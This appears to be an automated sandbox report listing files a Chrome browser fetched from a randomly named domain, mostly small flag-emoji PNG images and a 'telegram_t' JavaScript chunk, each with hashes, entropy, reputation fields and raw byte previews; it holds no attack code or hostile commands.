                                  Preview:.PNG........IHDR.....................PLTEGpLRh.Sh....1Hz}../Fw...../Fw0Gw}........Dc.<X....Rn..Ev|..+Bs....../L.Zo.0Hy...0Gw...z..0Gx...-Du...)@q6M......4K|(?pTn.z...................................................................................................................................................................................b../.....c........p..9........q.........w........w.......%}....y..}....t..k.s......o..l..k..k..j..s..j..v..0..z..i..h..l...i..}.....g..h..f..e..B..g..l..d..c..q..d..b..^..h..u..`..b.._..Y..^..l..._.f..\.._..\..n..Z..U..Z..6..Y..[..W..d..^..V..g..P..U..V..Y..S..T~.R~.[}.M}.Q|.T|.O{.Oz.ay.Sy.My.Mx.Rw.Gw.Kw.Lu.Ju.Hu.Ot.Ht.Rs.Hs.Gr.Fq.@q.Kp.Ep.Ep.Do.Dn.>n.Km.Dm.Ai.8i.Gg.Ag.Ed.4d.Db.BT.<b.=`.A^.<^.=Z.7Y.;V.6V.9S.1Q.8O.0O.3K..K.-I.-Ey)At&=oP.......tRNS.....%,5==NTcccceffix.~~...........................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4860
                                  Entropy (8bit):7.931528305670703
                                  Encrypted:false
                                  SSDEEP:96:ZqorYgq9xVgPSTeqEguM28tRZZAivgxLvnEuIDJ68CkJ/YmfZDM6K1:oobEY2EguORgBboRjJtfxM68
                                  MD5:AC5C244069BAD7F50D366D2E972D60E8
                                  SHA1:C6C53F0A8B2633C1660A02212A23205B2801F490
                                  SHA-256:7F1311DE4FDE2EDD1122FDA33CE0896856D818E21E2D1061A8C66F25CE67CB06
                                  SHA-512:B73F78E248BF52866D451BD8A3E42360B13B72B02F7EBF4886270683F4C06F6B519BAA6D268C919B7B7F9C5506EECAC530A3D62B066902B641963DC90DA7480A
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e7-1f1e6.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.q?<_..<<m..O....L.rgg...M{|..i..U...cc."#k.j..M``...Q..T.q66t..Ljj..l..Ode...N.e.....K.kee...N....i..P.kdd...H.l.hU.??{.../)9...............................................&.....%..&.....%..%..$..#..#..0..*.....%.. ..8.. ..&.....?........"../...........E........L.....4.....'........S...........0.C.......j...T...e...Y.*.>......a...G.Z.........M.............d....D..... ........Uz{........}d...uu.no..os.x.gh.hh.re~cd.]^.\\.ST.VV.RS.PP.JK.JJ.FF.CC.FGp@@.9:.<=.89.78.56.66.45.67.45.34.12.01.12./0.44r-..,-.-.../.&*.+,.++.)*.'(.*+.().''.&'.&'.()y$%.%%.%&.#$..!.$%.''p"#."#. ".. .$$w. .. ....!"m. {!"j................... ^.....g.....|...........X.....q........\..~..}........}..S..e..y..}..|.....{..s.....l..[..O..b........W..T..J..E..z..~....XtRNS.....#%076CMQTY]cgfqv~.................................................................. .5....SIDATx...kp\.a...y.{.!.Z...6..c....5.$..(......!$CB..$....CS./.3M...m&...L......3
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4503
                                  Entropy (8bit):7.935248201909624
                                  Encrypted:false
                                  SSDEEP:96:yNmhLg5d5AYcG1BOVhGy1qPF/qJI2wLVE5hmYrmedDvoL1Qtf51MIUI:mmhIAHGyyZaI2ey0XQboL1Q+If
                                  MD5:1ACD9FA787F298D0433D2034EFFFED00
                                  SHA1:013F76A07969073CDF2DED1C88C1EB7F9D777A3B
                                  SHA-256:C828B5F08841998B615F16B9BE38BCF650DAEE8F4A9D7737DFD731323606D53D
                                  SHA-512:72F52B02897BA5C4E29AD9D2404FF88D7345DA77FEBBB530DF0FBACE11210C7BC921B2FE89D663D655AEB2AABE837D24E1B01E264CE0BC9E989FE8E2CB488484
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.][.?'.em.A&.nv.A&.bi.@%..#. ,.Y7.mt..:.A%.z..D"v..u...jq.4=.px.@%.el.@%.px.ip.D(.qy.>#.dl.CI........7..<..:..5.......g..F..4..5..?..7..4..6..'..?..&.....3..k../..G..-.."..+.....W..(..?..A..&.....$....."..d..>.. .............%.....?."...Ad.....$...K....L..8....p....L.....$.V.=....@..Q..Q...F.."..;v.R.(....tSi...zBr.d..R.. ..!.px....u)._S~.(#..I.`.jrm.|.RX.bk..SB...dl.[dL.R.IZ.\e.T`.}..\d.U`Y.5.N[.A[.W$.HV.ER$.n.U].LYD.=kqW._U.?M.MW.9I&.Y.C,,}.C}T%.X.AN.4E%.WrgA.4D.FP#.V.3D#.U.3C.8F!.T.0B:.0.1A .RIr@..>.=G..P_bK..`.43.+=..N.~N.*;.3A.~K yL.+:.'8.{ISYK.$5.}Y.yF..B.sH.*6.wD.!2.48.uC.pB."0../.sA.kD....q>.l@..,."1.n;..*GKI.d=.g<..(..*."/..5.k:..%.i7._:..$.g5.c:..".[7.e2..*....b2.W6.....,.]2....R1.X-.L/.....#.P).H-.K)....F%z...A#t...<.t...7..q9.... tRNS...".9EUacccggt~.~~..............|.^...&IDATx...Mn.F....F?.d.q..h..Ez...u.E.Yf..t.EN....Y.I.".~lj8...C..L)..8...l.. ..>jh.Z.V..j.Z.V..j.....T.F...........0.jue.:l{.I.Xe.o..hL...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5630
                                  Entropy (8bit):7.852689694343607
                                  Encrypted:false
                                  SSDEEP:96:CsiK5556QzhI5bFbq/shFdc1hiP0bpF3fyhKy7SjC2TCV/R3lSNqB:DzPy3q/szjP0bpF307Sm20a4B
                                  MD5:697ADE357CE52985DFAA55264DC6D317
                                  SHA1:B05A196BBAF267E706B617DF5E6AA9EEA5D47EE5
                                  SHA-256:0C80A73526E5AE887B26584A0577D823B26E4C0649683B190D12FD67B08D2139
                                  SHA-512:8E85BF1B7BDA530DA02B8BF36A236A7EF568CC188486544E0CA4FA528A13402C86B4CE336DBBFA920ED4623024E3EF85466326E837B6E5DDD8960782C10A69EB
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1fb.png
                                  Preview:.PNG........IHDR.....................PLTEGpLLb..$Lbx..(Pg}..#Kf|..+S...g}...,.6hKc..#K.2_......oYgv..q....Rbx.k...$L<T~f|..%LZp.f|..#Kk..`v..$Lj..bw..'Ok....E...................................................................................................g.....!..............&.....3...............D......-.........C...........G.............V.x.~.......ar...dq.lt..pg...Vci..cz..Xbez..KWTx.^v.iwpWs.\r..?PPo.Tm..CMHj..4EOh..0BAf.Ed..->.7D:b.B_..):.$65].?\..%68Y.-Y..!2....%4-U.&V.&V.2T.&U.%U....$T.%T.#S...($R...+"Q.../!P.&O.,N..O. N...(.N..M...%"K..K..K..J...#.I. H....*Ft. ,.G..G..G..F..F... .D..C... .C..C..B.....A..A..@..@..?..>}.?..?..>..=..;s.<..<..;..;.....9u....9..8..8}.6j.7..7..6..6..5..2c.2m.3~.3{y...2|.1..)../[.1y.0|..../{./u.-U..y.,..+a.*U.,qv...(y.)i.&R.&_.!v.#M. T..n..H..D).@ ....tRNS....,7BIScbcceg}~~~~~~.............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5210
                                  Entropy (8bit):7.9359920829997295
                                  Encrypted:false
                                  SSDEEP:96:wn9r3I+mS3D8WuhxgPw+ZjAr5jyNBk+4gv1BRyZgJeh+Wk2Ning0pKSrOLHz:w9MdSVDZiyNW+PBqgEh+v2MZpKPLHz
                                  MD5:3BD35E47AC3FC115FA96FA65F786AE14
                                  SHA1:94557FA4591AAF883B0B7B6F8FFB90A5A239EE77
                                  SHA-256:11BFBB0670B8C66E46225AFA1DBEE0445CBD3C4DDBA40B8605B465306842650C
                                  SHA-512:1607CA84113177C56F5D1A0799096C1C181074F99F4B808BF71AC21B12D672BAA4036A8D5D830BB4CCADDB88FFAA65F56F1B08E5E0D89200964C0CFFBF736F8E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f1-1f1e7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.:/z'..v.ti.{.tj.zq.ypx'..zp.{.|r.x.zp.}s.ul.wm{)..y.ka.9,})..K>.F8.dZ.#.....TL......r ..z.-"z(.w%.y%.y'.y&..wm.vz&.t!.{)..Q=.O<.K8.D0.B0.H7.gU.bN.M9.H5.C/.=).>*.\H.WB.UA.P<.H3.E0.C..A,.?*.=(.9%.7#.6!.9&.E4.=..aW.oc.Q=.M8.J5.:%.4..4 .2..?/.9*.YC.T>.K6.=(.eX.5(.+..WC.$..3$.*..5$.<*.O:.-..4!.0..YD.ZD.<%.4..-..#..*..U?.M5.F..A(.=%.u... ..|l..|..............................................lZ...............................................................5.............................................................................................cW.wl.......ob.hY.....................Pa...........;..K..........E..T...........&.[0.bR.|".XG.t......s.;.j..+.........,..1%.$../#.*.z%.z .r..._O.]O.XI.vh.qb.eT.VD.P@.WJ.l\.]J.VB.pf.}s.xm.k`.z ......,tRNS.."5Udk..@..........c....}c~c~....gO1"@..I..%....IDATx....R.P..a;.. ..m......(....V.(..R....1q&.PD !..v.1.j[....'....;k..h4..F..h4..F..h/.W>.c6[,V..f.Z-..7../.6.p......aeL..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4584
                                  Entropy (8bit):7.918304740736297
                                  Encrypted:false
                                  SSDEEP:96:Y0CFgRZ5hE6dH3+hfFAB5dDManUru2WfZq5Q52n2o5lWuB:Y0C2j5n+NcHUa7xqn2o5ld
                                  MD5:6F637A60248BE27639AC439C8E05BEED
                                  SHA1:4072F71C2EFB105418E3128D114DD6DBCB7AE616
                                  SHA-256:D25C6863FC5BE6B88D3AAE67D642815E682B97424C4E1414F83E4032DCD94D8B
                                  SHA-512:668393E7B2EE4E46BD619ECFDDE00946CFBC9AB6510303D8BE41AD51BAD5492A2BA3E3B1FE464A77B4166FBCF27DAF17E9E609BEA4BCCCABBF6A91E8A59ED33B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.X.. -......u..T`T3o3IZI888ggg7S7M`Mhhh.L.iii%Q%.K.#R$&M' O jjjaaabbbccc!Q"(W(ddd#S%(X)"Q#(Y)hhh/(....<<<.4E.......3DP.R..........0B..?.....&.(9O.QN.P.......%6..$..*,....0.3D......../.....).#4.*;..+J.L......P.R2.4.../.14.6...N.P..#6.8"##.2C.->K.ME.G1.3...@.B..-.. .!2+.-8.9I.K(''A.C...;.=___C.EF.Hy..9.;*.,..!2o3=.?.,=..+...<.>+++..".#"BBB.X.FGGQPP&X'7|8@&)#h%(d).5ITTT)z+.]!;.=+`,<.=LLLq+2:.</00&t'.4GL'+.4G."1.K..N.*[+.i0.Q c*0.!.."1......'o(M.N2%&.!.*~-$U$...344ccc...[[[.....04.4.u/|,4.-8..#..<. 0."14t6XXX.0<.)2...I.KB.B?>=V).9 ".)A.4E.H...'D.DF.G..7.#9jjj.2@..,.......!A:;;..BH.I.. ggg?.A..3@.T.2D9.;./B?.P.3H-.@I.RL.!l..bs9../6.G666.4Cv"+..>;.<..'Y%*}<3f%,^ %.AK.[F".4M..2..Ov3(..>.>(.;.'1.lIrK<.JM.;A.KE\g2*.4.;@a.P...v.LFQP4..\[*~qDc.FUFG+.9e=<QYX.HWo.P~~K.h.i...$tRNS..cc~~5c...".e..h.N....y=.S..w\..~...8....sIDATx..._H.....r...*..T._z..j...-5......}(.>..P.;b.....2...&P.oaf...\p. .........&.1..A.}(.>....3c..v..j...........s.B...*T.P.B...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3986
                                  Entropy (8bit):7.89342242843146
                                  Encrypted:false
                                  SSDEEP:96:Li0QlwcV8WFPwEX9zQXsrTCDeSsaCuY8TdoXmdibMtx:G00wcV8WB9zQXsTCDeHazoXmc2
                                  MD5:9596CF715CC1FE885F6000866C7F165C
                                  SHA1:C1C8DBE7B96FDD1817B393DF070C1B6DF4FD8253
                                  SHA-256:FE7C25755248B8BE3BB2EFB4AFFCB90D67A3FEBAE1953B70DE593C209322C916
                                  SHA-512:06A4F10A25A61C3B9430FE9B753BD451D961D73E783B15B953F0155DA0CD6067DD225238EF80C04B1CCA548F88DF402D9543FF1561B599AF84EA606C4EB84635
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLOZONWN8K8(C(ggg'C')F)eee-@,...9]9...nnnbbb*D*(D(ccc.--u..m...>>r99'D(eeen..$=%hhh9M9)E)hhh%A%eee]]])E)gggaaakkk&:%.J.kkk]]] < -J-.:.%A%..............................................................................................................................................................~...rr...s.sh.h}.}[.[[.[zzzZ.Z.XXY.YY.YX.XV.VuuuU.UT.TR.RU.U.IIqqqP.PN.NH.HL.LkkkN}NI.IhhhD.DH~H.AAI{I.::E|E.>>dddDzDHwH.;;CxC9}Aaaa.::GrGAvA.M<.88CrC>u?^^^.77>r>.22.55CmC<q<[[[.C7-w;.33:o:4r6.)0.22?j?XXX:m9.116n6aX5?g>7l7.//UUU6j6...sJ2.(*SSS2i3.--RRR.64.0/;a:.,,.?.4d4PPP.**9^9.!"NNNKKK.((1]16Y6.//m::HHHu44.&&#`$3T3.V.EEE1P1ABB*R*/M/.""T77.""===*I*:::x..&E&t..666!@!j..222R#.)33.;.---***)))(((&&&%%%$$$###"""!!! ...:..............................................G....tRNS...!08?KRTcccddfvx~~~.........................}.".....IDATx.....W....Y.tu.l....\....77....AP.H,..,.J.&!.....x@B.......-..&CH....HX...x...J.SUS.3=...A.U.tO.....w..v..,y..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4987
                                  Entropy (8bit):7.913761415595662
                                  Encrypted:false
                                  SSDEEP:96:zNfOoHiZRT62IybenzDHS89MgSX3zdWpLFPIpxtjRaA6R8CFLPPrJv0xC:hmLZXI9zzSq4zuLFgpTlaAS116C
                                  MD5:E7B5E273400011D6B0292A32B0338A2E
                                  SHA1:60408CCA85DF85252B7D206AE08D10B324ABF1BB
                                  SHA-256:88146190D2B5D44E4BCD152368B17C82E36F07274C761C8CEC16F442524E4649
                                  SHA-512:470C64AEA45A85196B4B0B42A1C73B9EA84ED7597B3FE04AAD6EDF9C9765E7DDF6928E234807BCE8944F8BA5A31FBEEF8130F1E68C3ADE00C5C5B31722BD92C5
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpLd.t.?..A!g.w.=..B"a.q....s{..3.V/.<.g.w.>.c.rSt^.........y...A.e.u.<.<oMi.x.?._.o.?..6.j.z.<.b.r.?..@ /eBk.{[.j.8..............................................................................................................................!.....#..&...........%.......)..........-........0........4................:......{..z>n...n.v......jB.dzc.xi.y.m{e.u.Xo.YG._q_.p^.nJ.eU.j.LfY.j.JK.QfJ.bS.dI.`.@U>.Z.9OC.Z.:VG~[.BY.4R4.R.3R.1Q.1O.N[BzV5.P./O./N8}Q.+T+.K.-L.,K%.G.*I%.F7vN.$U+|H.2K.(G".D"~D..W.&E."C.;L.#D.%D.|A)vE.$C..X.z?."A..>,oD.!?.v=..>.x9.r=.!>..<..<.u7.!=..8..:,e@..9.m9.!:..8.p5..6..6.r...4.m1.h4..3..1. 7..1..2.j-.a4..0..0.g,.....-.a..\0.d*..3..+..-..+.c&..'..'.a$.W,..(.^#.Q*.[ ..%.W"....L'.W..Q...".F%.P..J.|...C.x...?..@.x...:..6..3.&.K....'tRNS...*5>PRcccccdmxy~~~~~...................F.....IDATx.....W^..o.S.n}....vp@..x...*@....H.>....xD.....".<..>q..*..v..,.&K6.$.Nl..K_.~.E.9US........U.......w....-..X8.Y....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4467
                                  Entropy (8bit):7.928800723319524
                                  Encrypted:false
                                  SSDEEP:96:YZke1oKs66XCUmyp28OyOB7Lj+UtwmOUvBy6xz/vCSfQUnMql:YZXCKs9XzDp28/OZLj+U9vBy6NCSfHX
                                  MD5:FCF8276FFC8A07CB855DC99D794A34D6
                                  SHA1:DA97626BCAE993267CB3BBAF4AFE3070A43524DC
                                  SHA-256:6B96003E7F13F61E6B696C65FAC29B8DE5154441AE37FCD61B376DC599D0E671
                                  SHA-512:08287D9BFD782B77CD65AB264DCF7DCEBCE134AA18CFF5F414FB5A5DEBDE8762475D6CBA026F33232D5EF30E5E4C74785B5D2A1FB1BA9B909FF59C833B57E623
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLq....iu.]l..t.\p..~.go..|.dX.<p.....:p..&!..io..x.`.P..Au"^.u.[p....jp..z.bq....jo..y.bg..u....ks.[u .i..@xB....................................................................................................................................................^.........v............g...o...{.U.vp.~..j]..|.d...s.Qv.Yl.Dv._.gbk.Gd.6s.[n.Pa.6Y.&Z.'l.Sc.>.ZTX.$W.$X.%Z.-U."T.!a.@S..e.L{zyR..V.).OH`.B.XVO..N..2..T.*X.4L..G...iaJ..Z.<.@:.@8G..A..N.&.>7F......<4.=5C...:2<..R.+.=6B..E...80.4,?...5.=...811.3.3+@..:...v..1).609...( .s...&5...BU&xb>z..4-4...p..+#.-&...2..hUI.m..)!tGi.n..n..l..+%.k../(. ..&..j.8o....8m..$..g.${..g.,Z..f..b..!..d..,'."..c..%..b.....a..].....|.....^........'#.Z..!.f8:....&!.P..T...........#..M.z".....H....v...Cz.At{..p..h..A ........%tRNS.....%,8BSUTcccdqw~~.................m.;.....IDATx...[ld.]...._.e.3...7..^..e.%D(.T..A....P.*^..<...J<A.O<T......J.B$.".......hKi6.:iw7%.f.k...._N.....3.......e.d.G.....=Z&M.4
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3679
                                  Entropy (8bit):7.933989066143552
                                  Encrypted:false
                                  SSDEEP:96:Bn/B0iXD/p3M3zdQlCSGzCYsucpTKsIrjl:Bn/phMjyGQuiejl
                                  MD5:EFD0AD4821922BE63008DC46A3FEE452
                                  SHA1:8E09B8A4BF3DA4E0F3A3800B4852C3BE8D91DDF0
                                  SHA-256:DBE5F8BB864489DE78A18061C1D12C6E0618F0C9B47D91036CB7690B783BC72F
                                  SHA-512:8D42BFB8AAB5785C8E4423E0B25CBE36F5EE4CEEF788C80A8ECAD0885468FDF2DDEFBFF60B6D551541514F9D9D0F59CAFFB0F8830F95B2615AACD1BFADAFDBA4
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.pvf......sxn.$...syh. ...y{e...<I}}}.mw...!/h..zzz.gpvvv...r. .........nxh..ttt......hrj."...s}yxx...j. ....jt...a..}}}n.%.....a...s|.cm....................................................................................................................................................................................................................................................................................x......mw.uz..{....ls.ep.gpx..._k}|{.Zh.gm.qp.Tbwvv._g.N^.Xcsqp.GX.O\.?R.ET.NY.9M.6K.6K.6J.5J.5J.5I.3H.1F.2F.;L.AO.FRib_.3G.0D.3F./C.NT.,B./B.,A.0C.+?.;I.+>.4D.(<.-?.';.%9.6D.(:^RP.#8.!5.*;.0=. 4."5.#6..2..1..1..1.(7..3.#5../../s9@..-..,....&4..,."2LGC..*..*..(..)..'..&..*.!/.!...,..%..%..%..$..$..,..#..!z.)..%q.'...p."s../*(f.._.....~g~P...1tRNS....."%36=CLUX_acghx{~~.........................."d.8....IDATx....$g........g.{......41..../.!x.Aa..M.....^E."(.! zT$.r.d..&D...w.......yL.LQ.....n..w........U.n.u..[.n
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3597
                                  Entropy (8bit):7.8222571303237
                                  Encrypted:false
                                  SSDEEP:96:Nx6wk8gdhc/UGCfl0YsyYXHd2+Cx4NlE4X7yrVf2ctJ7:L6wAhc/3CfHstXsPox7yrEcH7
                                  MD5:B214FB33DF8EF10C3F6D725E550AB8C0
                                  SHA1:DE60901B305C9B5587A3A9FC91F1794EF836CA67
                                  SHA-256:DC1913ADA04169A23DB8B88EF0D485E053327F2179DAC907B0D40ED9032F34EB
                                  SHA-512:7219016D55FAE7187100FB4949BE0CB999010CB562E89A8A518BEB0CA92BF4CEEF21ECEDC2191C55A93AD014D62BEED7CC92BE6863AC55D772699E655BD2D821
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1ea.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.....s_A.T.t}..]D...Wb......a.../F#eD.x....]_..._....q;..L/.....a.L/....H..Z7..bc........r>..M1...H.p..^e......M1r=..........c......M2..c.I....t?.....L0...a..t>....6.b..\............................................................................................................................>.?....h......M.*...].A.4.....................!.G.......R.3.~..~..}....d...{...C.}#.z..y..z.....|..w..v..v..w.]...u..t..z9....s..u..s..r..q..p.L.}.q.B.|U.}.n.0.z.o..m..m..l./.x.l..k.E.x.j..p+.j..l..i.6.u.h.J.u*.p.h.=.q..n.c...l..kA.l..j..i-.j..h..g..f.`...f.]...f._...d&.d..b..c..c..c..b.[...a..`.._..^..^&._..\..\..[..[.T...[..Z..Y..X+yZ..V.Q...U..U..T..T..S.|T..R..Q..Q.K...O..N.qN.H..G..{L.uK.yJ~D.yC..sF.mFx?..aB.hAq;..d@.`=.]9.W9.Z6.W5.P4.R3.M0.I,.*.....tRNS.....%-.9::;@NSV`cdedgqwyz~....................................................................................................................................................`eZ.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3905
                                  Entropy (8bit):7.878403960845231
                                  Encrypted:false
                                  SSDEEP:96:RxyyqhS+zJMstSq2SiHj8W4iADdDZxxn6NT9oX5AnMnV+:XNqhRHiD8OADvxxn6NT9op0MnV+
                                  MD5:B75C264E0836E912BD587ED5D58B2C70
                                  SHA1:B761CD66F2A0D4DCD42C6DF519C2C71245C39A11
                                  SHA-256:5AD2F63B7ED8D2C85BD52C22E7EEBBDAA9B2E096F9BAB8EE8C25CCED188592D3
                                  SHA-512:57A9B15D5A1A7D5DD503ED5E36CB4A74600629FEAE3F51FE5389A9FF4EDA55A756CC2DD453FFD82EFDD7342DF4574D8D1EECBD3B5B264D2097FAD1EACA9241D3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f8-1f1f3.png
                                  Preview:.PNG........IHDR.....................PLTEGpL`[:...w^[..t.WM&....hk..b.z.|/..k...@!.ib].u.&)...{/.?..WZ.npm...M%.~0.B!...lo<wW.}0b.yj...@".|/.B"d.|...@!.D%.}0.kns...B"c.{...}0k...@!...}/a.zk...gi9xV..^..]..]..]..]..\..^..\..^..\..]..]..U..\..[..T..\..Z..[..[..S..[..`..X..[..W..X..d..[..W..W..X..g..W..V..V..k..W..n..T..r..S..]..T..t..]..Q..u..x..x..O..\....z..~..M..[..K..\.G..\..E..\..By.[..>..:_.[.rr..5_.x.ikH.[.]`..2J.c.ad.PAT.o.~05.Z.\_.PUD.h.UX.x,G.d.EI&.[.PT/.O5._.EI..[6.Z.GK.:?.4:).U.6<..[.28.;@./5..N..M..Z(.Q.9=./4.,2..L..K.&9..J.05..Z.*/..I..H.~I..G.(..'-..O.9;..F.&,.(...E.*/..M.%+..C.wF.$*.~B."(.*/..Y*nG.~A.$*.yB.|@.!'. %.&+.z>..%.y=..#.!'.w<..".v;.&+.',..!.o=.u:.......s8.d=..........r7....q6.l8....%).p5....%)..$.m4....k3.d5.g1..!....a..[0..!.X*....S+t...K(.O%|...K#.F$.B!j...>..a .....tRNS.....%.4599>EIHTbcddfop|~......................................................................................................................."...fIDATx...n.6...HQ...s.C.v1..7h
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4288
                                  Entropy (8bit):7.798406196206517
                                  Encrypted:false
                                  SSDEEP:96:XB4vpboqdhIFgoGrYcCMgyRgAWAhOGx9IUoWBup+:x4eqduFivCMgmgoD9IGu0
                                  MD5:0F22223C07B642A1EAAC664347E55939
                                  SHA1:F3D142E68324E15E9E90F0D1F313CEAAB9AC2275
                                  SHA-256:5B998721BF7DE2D39D2419D97F9D24A93B9A11A76C43478C51F0EE26F2593B72
                                  SHA-512:575FB25B38803C8BF61EDEA1AC9E7E721448D4AD690055F2C4CE65338FE157E783105E8D09C1CEE708C752445B44B2E7BF08AC8F19C5F6B965B22E97CE763067
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f4-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.#.."..$..)!.-$./&.2).4+.4+.5,.7-.8/.8/.:1.;1.=4.>4.>5.@7.A8.C:.D;.F=.H>.J@.LB.ND.OF.QH.SI.TJ.VL.WM.XO.YP.PL.JE.rP.~Ua.XM.Y9.].._..a&.^%.^%.]#.\$.\".Z!.Y .X..V..S..R..P..N..K..G..F..A..>.~;.|9.z7.s7.k2.^-.S,.P).K&.E .E".L).............................._Z.]X.91.82.=6.A:.C<.C:.@6.5,.&...........|w....(..;2.91.3-./(.)".-&.2+.2*.z?1x?.91.4+.ia................D9.;3I|G..N.WD.?;.E<.MD.UM._V.f\.lf.vq.yu.uq.ur.tp.vr.md.bZ.QL.H<.M3i[6Ck:.cF..S..X..^p.SttI.bZ.tl.................................................................................................................................t .u!.x"..#.v..t..{...ok.U0.P,.P,.P,.K)!H(%D&BQ6.Q,.S......._R.3).2).-%...............................]U.OH.oi....!..'!n2&.c3.f:.Z3.V1._6.p?.{F..N!.Q".V .S..J..G.uA.k<.c8.Q......tRNS.~...........................................................................8k....$TUcc................................................^%.........................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:downloaded
                                  Size (bytes):140233
                                  Entropy (8bit):5.276319283154825
                                  Encrypted:false
                                  SSDEEP:1536:IW3M14X1jDx480MHyQL3YLZHZp+snJhcssuovxz2Rs8:3Xxq8mwmJs9E
                                  MD5:FDD268F67CF5C4F79320041E3D156E98
                                  SHA1:D66194EE702467DD19130DEE59BD824990F5BC71
                                  SHA-256:36E5EF6880E869BDF9EF2119932DBAC7330513AEFC50839CC2A6FDDE7B519967
                                  SHA-512:F8C983FDFC6562B92F7839AAD2BB7D4F75A28A43F636D5B4EDA8BD25B15EB2CD87E4CC3A78C9DE13FB2339C1FFDF95EB6A59C5D8CEB8FCCD6FEF16C93967810D
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/5905.db5d2749ecb90aaf2752.js
                                  Preview:(self.webpackChunktelegram_t=self.webpackChunktelegram_t||[]).push([[5905],{5905:(t,e)=>{var i,s,r=(i=new Date,s=4,{setLogLevel:function(t){s=t==this.debug?1:t==this.info?2:t==this.warn?3:(this.error,4)},debug:function(t,e){void 0===console.debug&&(console.debug=console.log),1>=s&&console.debug("["+r.getDurationString(new Date-i,1e3)+"]","["+t+"]",e)},log:function(t,e){this.debug(t.msg)},info:function(t,e){2>=s&&console.info("["+r.getDurationString(new Date-i,1e3)+"]","["+t+"]",e)},warn:function(t,e){3>=s&&console.warn("["+r.getDurationString(new Date-i,1e3)+"]","["+t+"]",e)},error:function(t,e){4>=s&&console.error("["+r.getDurationString(new Date-i,1e3)+"]","["+t+"]",e)}});r.getDurationString=function(t,e){var i;function s(t,e){for(var i=(""+t).split(".");i[0].length<e;)i[0]="0"+i[0];return i.join(".")}t<0?(i=!0,t=-t):i=!1;var r=t/(e||1),n=Math.floor(r/3600);r-=3600*n;var a=Math.floor(r/60),o=1e3*(r-=60*a);return o-=1e3*(r=Math.floor(r)),o=Math.floor(o),(i?"-":"")+n+":"+s(a,2)+":"+s(r
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                  Category:dropped
                                  Size (bytes):296503
                                  Entropy (8bit):5.5773634656064175
                                  Encrypted:false
                                  SSDEEP:6144:MHjJYD09b9rmTRCRFH8iQ8RDmMz0cuC1WbBBcrQqzj:ajJYD09b9rmIPci/RdzL1W9BcrQqzj
                                  MD5:A04BC08436674F0EBA06D5C190DC6FE5
                                  SHA1:3D0A8DBECECD918DA43706976766E246262D254D
                                  SHA-256:4C70083F389A2FAFC6A5F3C35179243623B4416CAB07A1C6CE08D3F7C1DDB2AE
